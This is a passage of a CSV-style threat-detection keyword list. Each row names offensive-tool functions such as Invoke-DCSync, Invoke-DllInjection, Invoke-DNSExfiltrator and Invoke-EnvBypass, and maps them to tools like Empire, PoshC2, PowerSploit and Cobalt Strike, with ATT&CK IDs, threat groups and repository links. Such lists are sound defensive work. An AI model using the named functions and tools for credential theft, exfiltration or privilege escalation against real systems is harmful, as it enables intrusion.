T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-DCOM.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-dcompayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-DCSync*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-DefenderExclusionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-DinvokeKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation 
tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-DllHijackingCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-DllHijackingCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-DllInjection*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-DllInjection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-DNSExfiltrator*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*Invoke-DNSUpdate.ps1*,offensive_tool_keyword,Powermad,PowerShell MachineAccountQuota and DNS exploit tools,T1087 - T1098 - T1018 - T1046 - T1081,TA0007 - TA0006 - TA0005 - TA0001,N/A,N/A,POST Exploitation tools,https://github.com/Kevin-Robertson/Powermad,1,0,N/A,N/A,10,1021,171,2023-01-11T00:48:35Z,2017-09-05T18:34:03Z -*Invoke-DomainHarvest*,offensive_tool_keyword,MailSniper,Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal,T1595 T1114 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-DomainHarvestOWA*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-DomainPasswordSpray*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-DOSfuscation*,offensive_tool_keyword,Invoke-DOSfuscation,Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html),T1027 - T1140 - T1059,TA0002 - TA0003 - TA0040,N/A,N/A,Defense Evasion,https://github.com/danielbohannon/Invoke-DOSfuscation,1,1,N/A,N/A,8,744,129,2018-03-27T12:16:18Z,2018-03-19T16:47:54Z -*Invoke-DriverCoInstallersCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-DumpOWAMailboxViaMSGraphApi*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*invoke-edrchecker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - 
T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-EDRChecker.ps1*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Invoke-EgressCheck*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-EgressCheck.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EgressCheck.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Empire *,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 
- T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*Invoke-Empire*,offensive_tool_keyword,empire,empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EndpointProtectionCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-EnumerateAzureBlobs.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-EnumerateAzureSubDomains.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-EnumerateLocalAdmin -Verbose*,greyware_tool_keyword,powershell,Find local admins on the domain machines,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*invokeenumeratelocaladmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-EnumerateLocalAdmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-EnumerateLocalAdmin*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EnumerateLocalAdmin*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-EnvBypass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUACTokenManipulation.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EnvBypass.*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*Invoke-EnvBypass.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 